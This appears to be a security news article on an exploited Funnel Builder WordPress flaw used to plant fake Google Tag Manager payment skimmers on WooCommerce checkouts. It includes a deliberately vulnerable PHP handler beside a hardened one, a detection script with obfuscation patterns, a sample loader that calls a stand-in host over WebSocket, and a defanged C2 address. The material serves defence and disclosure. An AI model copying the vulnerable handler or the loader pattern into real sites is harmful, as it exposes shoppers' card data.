Critical WordPress Plugin Vulnerability Exploited to Steal WooCommerce Payment Data

A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages and steal customers' payment data.

The issue was disclosed this week by cybersecurity firm Sansec. It affects every Funnel Builder version before 3.15.0.3 and, at the time of writing, has no CVE identifier assigned.

The plugin is installed on more than 40,000 WooCommerce stores, so the flaw exposes a large number of merchants and their customers.

How the Attack Works

According to the researchers, the vulnerability lets unauthenticated attackers inject arbitrary JavaScript into checkout pages; no account of any kind, let alone an administrator account, is needed.

The flaw exists because older versions of Funnel Builder exposed a checkout endpoint through which external requests could trigger internal plugin methods. Critically, the plugin neither checked the caller's permissions nor restricted which methods could be invoked, so functions intended only for internal use, including those that write plugin settings, were reachable by any HTTP client.

Attackers exploit this by sending specially crafted requests that rewrite the plugin's global settings, causing their script to be emitted on every checkout page.
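The bug class Sansec describes, as an added illustration that is not Funnel Builder's code: a hypothetical plugin registers an AJAX action reachable without a login and dispatches to whatever method the request names. All class, function, option and action names here are placeholders, and the code assumes WordPress's AJAX API (wp_ajax_{action} for logged-in users, wp_ajax_nopriv_{action} for everyone else). The hardened version separates the public read path (explicit method allowlist plus nonce) from the settings writer (administrator capability, no nopriv hook).

```php
<?php
// Added illustration of the bug class (placeholder names, not Funnel Builder's code).
// Assumes the WordPress AJAX API: wp_ajax_{action} runs for logged-in users,
// wp_ajax_nopriv_{action} for everyone else.

class Hypothetical_Checkout {
    // A read-only helper the checkout front end legitimately calls.
    public function get_totals(array $args): array {
        return ['subtotal' => 0.0, 'total' => 0.0];
    }

    // A settings writer meant for the admin UI only. 'hypo_external_scripts'
    // is a placeholder option key standing in for an "External Scripts" setting.
    public function save_settings(array $args): void {
        update_option('hypo_external_scripts', $args['external_scripts'] ?? '');
    }
}

// ---- Vulnerable: method name comes from the request, no nonce, no capability, no allowlist ----
function hypo_checkout_ajax_vulnerable(): void {
    $method = isset($_POST['method']) ? (string) $_POST['method'] : '';
    $args   = isset($_POST['args']) && is_array($_POST['args']) ? $_POST['args'] : [];
    $obj    = new Hypothetical_Checkout();
    if (method_exists($obj, $method)) {              // save_settings qualifies just like get_totals
        wp_send_json_success($obj->$method($args));
    }
    wp_send_json_error('unknown method', 400);
}
add_action('wp_ajax_hypo_checkout',        'hypo_checkout_ajax_vulnerable');
add_action('wp_ajax_nopriv_hypo_checkout', 'hypo_checkout_ajax_vulnerable'); // reachable anonymously

// ---- Hardened: explicit allowlist for the public path, admin-only path for writes ----
const HYPO_PUBLIC_METHODS = ['get_totals' => true];

function hypo_checkout_ajax_hardened(): void {
    // CSRF protection only: a logged-out visitor can still obtain this nonce from the page,
    // so the allowlist below, not the nonce, is what keeps internal methods unreachable.
    check_ajax_referer('hypo_checkout', 'nonce');
    $method = isset($_POST['method']) ? (string) $_POST['method'] : '';
    if (!isset(HYPO_PUBLIC_METHODS[$method])) {
        wp_send_json_error('method not allowed', 403);
    }
    $args = isset($_POST['args']) && is_array($_POST['args']) ? $_POST['args'] : [];
    wp_send_json_success((new Hypothetical_Checkout())->$method($args));
}
add_action('wp_ajax_hypo_checkout_v2',        'hypo_checkout_ajax_hardened');
add_action('wp_ajax_nopriv_hypo_checkout_v2', 'hypo_checkout_ajax_hardened');

function hypo_checkout_save_settings(): void {
    check_ajax_referer('hypo_checkout_settings', 'nonce');
    if (!current_user_can('manage_options')) {      // the check the vulnerable handler lacked
        wp_send_json_error('forbidden', 403);
    }
    $scripts = isset($_POST['external_scripts']) ? (string) wp_unslash($_POST['external_scripts']) : '';
    (new Hypothetical_Checkout())->save_settings(['external_scripts' => $scripts]);
    wp_send_json_success();
}
add_action('wp_ajax_hypo_checkout_save_settings', 'hypo_checkout_save_settings'); // deliberately no nopriv hook
```

With the vulnerable handler, a single anonymous POST to admin-ajax.php naming `method=save_settings` reaches the settings writer and can store a script that every checkout page will then emit. With the hardened handlers, the same request fails the allowlist, and the writer is only reachable from an administrator session.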

Sansec explained that attackers are disguising the malicious code as legitimate Google Tag Manager (GTM) scripts inside the plugin’s “External Scripts” settings.

“The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout,” the company said.

Fake GTM Scripts Used to Deliver Payment Skimmers

In one observed attack, the malicious payload pretended to be a Google Tag Manager loader while secretly downloading additional JavaScript from a remote domain.

The malware then opened a WebSocket connection to the attacker's command-and-control (C2) server at the following (defanged) address:

wss://protect-wss[.]com/ws

The server delivered a payment skimmer tailored to the targeted WooCommerce store.

Once active, the skimmer could capture:

  • Credit card numbers
  • CVV security codes
  • Billing addresses
  • Customer personal information entered during checkout

This type of attack is commonly associated with Magecart-style payment skimming campaigns targeting e-commerce websites.

FunnelKit Releases Security Patch

FunnelKit, the company behind Funnel Builder, has addressed the vulnerability in version 3.15.0.3.

Store owners are strongly advised to:

  • Immediately update the Funnel Builder plugin to version 3.15.0.3 or later
  • Review Settings → Checkout → External Scripts for suspicious or unfamiliar code
  • Remove any unauthorized scripts or tracking tags
  • Conduct a full malware scan of their WooCommerce environment

Updating closes the injection path but does not remove scripts an attacker has already stored in the plugin's settings, which is why the review step matters on any store that ran a vulnerable version.

Sansec noted that disguising skimmers as analytics or tracking scripts is a common tactic because administrators often ignore code snippets that appear to belong to trusted services like Google Analytics or GTM.
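A way to make that review less dependent on eyeballing snippets, as an added example that is not part of the article or of the plugin: the script below (PHP 7.1+) flags any stored snippet that looks like a Google Tag Manager loader but references hosts outside an assumed allowlist of Google-owned tag hosts, opens a WebSocket, or uses common obfuscation primitives. Run it inside WordPress with `wp eval-file scan-tags.php`, where it queries the options table (the LIKE filters and the allowlist are assumptions to adapt to your own stack), or stand-alone with `php scan-tags.php` to see it applied to a constructed sample.

```php
<?php
// Added scan, not from the article or the plugin. Flags "External Scripts"-style snippets that
// look like Google Tag Manager but reference hosts Google does not own, or open WebSockets.
// Run `wp eval-file scan-tags.php` inside a WordPress install, or `php scan-tags.php`
// stand-alone to see it applied to the constructed sample at the bottom.

// Assumed allowlist of hosts a genuine GTM / Analytics loader references; extend it for your stack.
const TRUSTED_TAG_HOSTS = [
    'www.googletagmanager.com',
    'googletagmanager.com',
    'www.google-analytics.com',
    'google-analytics.com',
];

// Returns human-readable findings for one blob of HTML/JS. It only sees literal URLs,
// so a loader that assembles its URL from pieces is caught (if at all) by the obfuscation check.
function flag_suspicious_scripts(string $snippet): array {
    $findings = [];
    if (preg_match_all('~\b(https?|wss?)://([a-z0-9.-]+)~i', $snippet, $m, PREG_SET_ORDER)) {
        foreach ($m as [$url, $scheme, $host]) {
            $scheme = strtolower($scheme);
            $host   = strtolower($host);
            if ($scheme === 'ws' || $scheme === 'wss') {
                $findings[] = "websocket endpoint $url";     // analytics loaders never open WebSockets
            } elseif (!in_array($host, TRUSTED_TAG_HOSTS, true)) {
                $findings[] = "untrusted script host $host";
            }
        }
    }
    if (preg_match('~\batob\s*\(|String\.fromCharCode|\\\\x[0-9a-f]{2}~i', $snippet)) {
        $findings[] = 'obfuscation primitives (atob / fromCharCode / hex escapes)';
    }
    return array_values(array_unique($findings));
}

// Inside WordPress: check every option that mentions GTM or a WebSocket scheme.
// Settings are often stored serialized, so unserialize and flatten before scanning.
function scan_options_for_fake_tags(): array {
    global $wpdb;
    $rows = $wpdb->get_results(
        "SELECT option_name, option_value FROM {$wpdb->options}
          WHERE option_value LIKE '%googletagmanager%' OR option_value LIKE '%ws://%' OR option_value LIKE '%wss://%'"
    );
    $report = [];
    foreach ($rows as $row) {
        $value = maybe_unserialize($row->option_value);
        $flat  = is_scalar($value) ? (string) $value : json_encode($value, JSON_UNESCAPED_SLASHES);
        if ($hits = flag_suspicious_scripts($flat)) {
            $report[$row->option_name] = $hits;
        }
    }
    return $report;
}

if (function_exists('get_option')) {            // running inside WordPress (e.g. via WP-CLI)
    foreach (scan_options_for_fake_tags() as $option => $hits) {
        echo "[!] option '$option': " . implode('; ', $hits) . "\n";
    }
} else {                                         // stand-alone: constructed sample, not real site data
    $sample = <<<'HTML'
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s){var j=d.createElement(s);j.async=true;j.src='https://tagmanager-cdn.example/gtm.js';
d.head.appendChild(j);new WebSocket('wss://collect.example/ws');})(window,document,'script');</script>
HTML;
    print_r(flag_suspicious_scripts($sample));
}
```

On the constructed sample the first snippet, a genuine-looking GTM loader, produces no finding, while the second is reported for its untrusted host and its WebSocket endpoint. The scan only covers the options table; injected code can also live in theme files, posts, other plugins' tables or JavaScript on disk, so it complements the full malware scan above rather than replacing it.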

Rising Threats Against CMS Platforms

The disclosure comes shortly after another major web security incident involving compromised Joomla websites.

Earlier this month, researchers at Sucuri uncovered a campaign where attackers injected heavily obfuscated PHP backdoors into Joomla sites.

The malicious code allowed attackers to:

  • Communicate with remote command-and-control servers
  • Dynamically inject spam content
  • Redirect visitors to malicious pages
  • Manipulate search engine results without the site owner’s knowledge

Security researcher Puja Srivastava described the malware as a “remote loader” capable of changing site behavior at any time without modifying local files again.

Final Thoughts

This latest WooCommerce attack underscores the risk that the WordPress plugin ecosystem poses to checkout pages and payment flows. With attackers increasingly targeting exactly those pages, keeping plugins updated and monitoring which scripts a store emits are now basic requirements for online store security.

Website administrators should prioritize timely patching, deploy a web application firewall, and regularly audit third-party plugins to reduce the risk of compromise.
